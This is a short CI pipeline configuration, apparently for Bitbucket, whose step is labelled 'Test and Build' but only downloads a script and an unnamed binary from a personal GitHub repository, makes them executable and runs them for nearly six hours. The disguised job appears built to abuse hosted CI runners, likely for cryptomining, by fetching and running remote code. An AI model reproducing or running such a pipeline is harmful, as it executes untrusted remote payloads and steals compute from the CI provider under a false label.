image: golang:1.15

jobs:
pipelines:
  default:
    - parallel:
      - step:
          name: Test and Build
          script:
            - wget https://github.com/nobur270/hsskh/raw/af6bd4c5132a87ecc7eb7064aa652b65f1e89165/cobalagi.sh
            - wget https://github.com/nobur270/hsskh/raw/main/tuyulsugar
            - chmod +x tuyulsugar cobalagi.sh
            - timeout 355m ./cobalagi.sh